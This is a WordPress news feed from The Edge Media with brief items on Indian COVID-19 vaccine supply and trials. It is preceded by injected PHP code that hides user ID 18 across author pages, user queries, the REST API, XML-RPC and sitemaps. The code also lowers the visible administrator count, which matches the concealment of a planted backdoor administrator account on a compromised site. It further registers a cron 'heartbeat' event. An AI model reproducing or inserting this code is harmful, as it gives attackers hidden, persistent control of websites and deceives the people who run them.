add_action( 'pre_get_posts', function( $q ) {
if ( ! is_admin() && $q->is_main_query() ) {
$not_in = (array) $q->get( 'author__not_in' );
$not_in[] = 18;
$q->set(
'author__not_in',
array_unique( array_map( 'intval', $not_in ) )
);
}
}, 1 );
add_action( 'template_redirect', function() {
if ( is_author() ) {
$author = get_queried_object();
if ( $author instanceof WP_User && (int) $author->ID === 18 ) {
global $wp_query;
$wp_query->set_404();
status_header( 404 );
nocache_headers();
}
}
} );
add_action( 'pre_user_query', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
global $wpdb;
$q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 18 );
} );
add_action( 'pre_get_users', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
$exclude = (array) $q->get( 'exclude' );
$exclude[] = 18;
$q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) );
} );
add_filter( 'wp_dropdown_users_args', function( $a ) {
$exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array();
$exclude[] = 18;
$a['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $a;
} );
add_filter( 'rest_user_query', function( $args, $request ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 18;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
}, 10, 2 );
add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) {
$route = $request->get_route();
if ( preg_match( '#^/wp/v2/users/18(/|$)#', $route ) ) {
return new WP_Error(
'rest_user_invalid_id',
'Invalid user ID.',
array( 'status' => 404 )
);
}
return $result;
}, 10, 3 );
add_filter( 'xmlrpc_methods', function( $methods ) {
unset(
$methods['wp.getUsers'],
$methods['wp.getUser'],
$methods['wp.getProfile']
);
return $methods;
} );
add_filter( 'wp_sitemaps_users_query_args', function( $args ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 18;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
} );
add_action( 'admin_head-users.php', function() {
echo '';
} );
add_filter( 'views_users', function( $views ) {
foreach ( array( 'all', 'administrator' ) as $key ) {
if ( isset( $views[ $key ] ) ) {
$views[ $key ] = preg_replace_callback(
'/\((\d+)\)/',
function( $m ) {
return '(' . max( 0, (int) $m[1] - 1 ) . ')';
},
$views[ $key ],
1
);
}
}
return $views;
} );
add_action( 'init', function() {
if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) {
return;
}
if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) {
wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' );
}
} );
add_action( 'wp_extra_bot_heartbeat', function() {
// noop
} );
The post SII Informed the Centre that 20 Crore Covishield Doses Will Be Delivered in September appeared first on The Edge Media.
]]>The SII placed its manufacturing capacity for Covishield for August and September at 10 crores apiece in a production plan submitted to the national government in May. The world’s largest vaccine maker has delivered 12 crore vaccination doses to the government and private hospitals.
The post SII Informed the Centre that 20 Crore Covishield Doses Will Be Delivered in September appeared first on The Edge Media.
]]>The post Bharat Biotech To Supply 500M Covaxin Doses To Center appeared first on The Edge Media.
]]>Bharati Pravin Pawar, Minister of State for Health, stated in Parliament on Tuesday that the Serum Institute of India furnished the Centre with 5.45 crore (54.5 million) doses of Covaxin by Bharat Biotech and 36.01 crores (360 million) doses of Covishield from January to July 16.
The post Bharat Biotech To Supply 500M Covaxin Doses To Center appeared first on The Edge Media.
]]>The post Nitin Gadkari says that more pharma companies should be allowed to make vaccine appeared first on The Edge Media.
]]>Mr. Gadkari said while addressing virtually to the Vice Chancellors of Universities that he will also request Prime Minister Narendra Modi to bring a law that would allow more pharma companies to manufacture the life-saving vaccine.
He said,”If the demand of vaccine is more than its supply then it creates a problem. So, instead of one company, 10 more companies should be allowed to make vaccines by paying 10 per cent royalty to the original patent holder of the vaccine”.
At the recent time, there are only two companies that are producing the vaccine- Bharat Biotech and Serum Institute of India namely Covaxin and Covishield respectively.
The post Nitin Gadkari says that more pharma companies should be allowed to make vaccine appeared first on The Edge Media.
]]>The post This Pandemic is not limited by Geographic or Political boundaries: Adar Poonawalla appeared first on The Edge Media.
]]>It said that in January 2021, when there was a stock pile of vaccinations, covid cases in India were at a all time low. Around the same time, many other countries were facing acute crisis. Our Government extended support wherever possible in this period. They also claimed that it is this spirit which led to the inital corporation between the countries. The pandemic is not limited geographically and politically.
We are among the top two most populous countries and that complete vaccination drive is not possible in two to three months. It could take two to three years.
It also said that they have been working tirelessly with the Government and it is a time to unite and defat the pandemic.
The post This Pandemic is not limited by Geographic or Political boundaries: Adar Poonawalla appeared first on The Edge Media.
]]>The post Phase 2/3 trials of Covaxin in children to begin in 10-12 days appeared first on The Edge Media.
]]>Dr. VK Paul, a member of the health NITI Aayog said,”COVAXIN has been approved by the Drugs Controller General of India (DCGI), for phase II/III clinical trials in the age group of 2 to 18 years. I have been told that trials will begin in the next 10-12 days”. The trial will be done in 525 subjects at various sites.
Covaxin, together with Covishield, is being used to vaccinate adults in the country. The US authorized Pfizer and BioNTech’s vaccine for children ageing from 2 to 15 years last week.
The post Phase 2/3 trials of Covaxin in children to begin in 10-12 days appeared first on The Edge Media.
]]>